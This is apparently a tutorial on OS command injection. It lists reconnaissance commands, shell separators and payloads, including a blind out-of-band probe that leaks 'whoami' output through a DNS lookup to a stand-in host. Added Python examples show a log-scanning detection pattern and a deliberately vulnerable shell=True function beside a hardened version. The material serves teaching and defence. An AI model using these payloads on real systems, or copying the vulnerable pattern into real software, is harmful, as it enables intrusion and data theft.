
# OS command injection

**Useful commands**

| Purpose of command    | Linux         | Windows         |
| --------------------- | ------------- | --------------- |
| Name of current user  | `whoami`      | `whoami`        |
| Operating system      | `uname -a`    | `ver`           |
| Network configuration | `ifconfig`    | `ipconfig /all` |
| Network connections   | `netstat -an` | `netstat -an`   |
| Running processes     | `ps -ef`      | `tasklist`      |

**How to Test this Vulnerability**

* **Simple case**

  Try appending `|whoami` to the end of a parameter value that the application passes to a back-end command, send the request, and observe whether the command output appears in the response.

  *This simple case works when the website applies no defense against this type of attack.*
* **Blind OS command injection vulnerabilities**

  The application does not return the output from the command within its HTTP response.

  Consider a web site that lets users **submit feedback** about the site.

  **How to detect :**

  * **Detecting blind OS command injection using time delays**

    Add `||ping -c 10 127.0.0.1||` to the parameter; if the response is delayed while the pings run, the parameter is vulnerable.
  * **Exploiting blind OS command injection by redirecting output**

    Add `||whoami > /var/www/static/whoami.txt||`, then find a function that retrieves files from that folder and alter its request to fetch `whoami.txt`.
  * **Exploiting blind OS command injection using out-of-band (OAST) techniques**

    Add `|| nslookup yoursite.com ||`, then check your DNS logs or use a Burp Collaborator URL to confirm that the lookup arrived.

    Add `||nslookup $(whoami).yoursite.com||` (URL-encode the space as `+` when placing it in a request) so that the command output becomes part of the looked-up hostname, then check your DNS logs or the Burp Collaborator URL for it.
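As an added example that is not part of the original page, the following Python script shows what these probes look like from the defender's side: it parses access-log lines, URL-decodes each query parameter, and flags values that pair a shell separator with one of the command names listed on this page, or that redirect output into a filesystem path. The log lines, the parameter names and the `attacker.example` domain are constructed for the example.

```python
"""Added example (not from the original page): flag command-injection probes in web access logs.

Assumes combined-log-format lines (Apache/nginx style) with parameters in the query string;
the log lines below are constructed for the example and attacker.example is a placeholder domain.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: benign requests, four probes shaped like the page's payloads,
# and one benign value containing '&' to show the parser does not trip on it.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /stockcheck?productId=381&storeId=1 HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:01:09 +0000] "GET /stockcheck?productId=381%7Cwhoami&storeId=1 HTTP/1.1" 200 498
10.0.0.7 - - [12/Mar/2024:10:01:15 +0000] "GET /feedback?email=x%40x.com%7C%7Cping+-c+10+127.0.0.1%7C%7C HTTP/1.1" 200 220
10.0.0.7 - - [12/Mar/2024:10:01:40 +0000] "GET /feedback?email=x%7C%7Cnslookup+%24(whoami).attacker.example%7C%7C HTTP/1.1" 200 220
10.0.0.7 - - [12/Mar/2024:10:02:05 +0000] "GET /stockcheck?productId=1%7C%7Cwhoami+%3E+/var/www/static/whoami.txt%7C%7C&storeId=1 HTTP/1.1" 200 498
10.0.0.9 - - [12/Mar/2024:10:02:30 +0000] "GET /search?q=fish+%26+chips HTTP/1.1" 200 1024
"""

# Combined log format: client IP, identd, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Separators from the page (& && | || ; newline) plus the inline-execution forms (` and $( ),
# followed by one of the reconnaissance commands from the page's table or payloads.
SEPARATOR = r'(?:\|\|?|&&?|;|`|\$\(|\n)'
COMMANDS = r'(?P<cmd>whoami|uname|ver|ifconfig|ipconfig|netstat|ps|tasklist|ping|nslookup)\b'
PROBE_RE = re.compile(SEPARATOR + r'\s*' + COMMANDS, re.IGNORECASE)
# Output redirected into an absolute path, as in the page's /var/www/static example.
REDIRECT_RE = re.compile(r'>\s*/\S+')


def find_probes(log_text: str) -> list:
    """Return one record per query-parameter value that looks like an OS command injection probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m['target']).query
        # Checking decoded parameter values individually avoids false positives on the
        # '&' that separates query-string fields.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:  # parse_qs has already decoded '+' and %XX escapes
                reasons = []
                probe = PROBE_RE.search(value)
                if probe:
                    reasons.append('cmd:' + probe['cmd'].lower())
                if REDIRECT_RE.search(value):
                    reasons.append('redirect')
                if reasons:
                    hits.append({'ip': m['ip'], 'time': m['ts'], 'param': name,
                                 'reasons': reasons, 'value': value})
    return hits


if __name__ == '__main__':
    for hit in find_probes(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} param={hit['param']} {hit['reasons']} value={hit['value']!r}")
```

The separator-plus-command pairing is deliberate: a lone `|` or `;` is common in legitimate input, while a separator immediately followed by `whoami`, `ping` or `nslookup` rarely is. Each hit carries the decoded value so an analyst can see exactly what was sent.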

**Ways of injecting OS commands**

A variety of shell metacharacters can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:

* &
* &&
* |
* ||

The following command separators work only on Unix-based systems:

* ;
* Newline (0x0a or \n)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

```
`injected command`
$(injected command)
```

Note that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.

*Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.*
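As an added example (not the page's own code), here is a minimal Python rendering of the separator and quoted-context cases above, side by side with the fix: a hypothetical lookup feature that interpolates user input inside double quotes in a shell string, the same call made with an argument list so that no shell parses the input, and an allowlist check applied before the command runs. `echo` stands in for the real command so the script runs harmlessly anywhere with `/bin/sh`.

```python
"""Added example (not from the original page): the quoted-context case from a defender's side.

A hypothetical lookup feature places user input inside double quotes in a shell command string.
`echo` stands in for the real command so the example runs harmlessly anywhere with /bin/sh.
"""
import re
import subprocess

# Allowlist for the only thing this parameter should ever hold: a hostname or IPv4 address.
HOST_RE = re.compile(r'[A-Za-z0-9][A-Za-z0-9.-]{0,252}')


def run_vulnerable(host: str) -> str:
    """Insecure: shell=True hands the whole string to /bin/sh, so a closing quote followed by
    a separator (; | || & && newline) in `host` ends the quoted context and starts a new command."""
    cmd = f'echo "lookup of {host}"'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(host: str) -> str:
    """Safer: an argument list is executed without a shell, so every metacharacter in `host`
    reaches the program as literal text and nothing is reinterpreted as a separator."""
    return subprocess.run(['echo', f'lookup of {host}'], capture_output=True, text=True).stdout


def is_valid_host(host: str) -> bool:
    """Defence in depth: reject input outside the expected character set before it is used."""
    return HOST_RE.fullmatch(host) is not None


def safe_lookup(host: str) -> str:
    """Validate first, then run without a shell; either layer alone stops the probe below."""
    if not is_valid_host(host):
        raise ValueError(f'rejected host value: {host!r}')
    return run_hardened(host)


if __name__ == '__main__':
    # Constructed probe: closes the quote, runs an extra command, then reopens the quote
    probe = '127.0.0.1"; echo INJECTED; echo "'
    print('vulnerable ->', repr(run_vulnerable(probe)))   # the injected echo ran
    print('hardened   ->', repr(run_hardened(probe)))     # one literal argument, nothing ran
    print('validated  ->', is_valid_host(probe), is_valid_host('example.com'))
```

The argument-list form is the real fix: quoting or escaping individual characters is fragile because, as the note above says, each metacharacter behaves slightly differently across shells and contexts. The allowlist is kept as a second layer so that unexpected input is rejected before any command is built.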

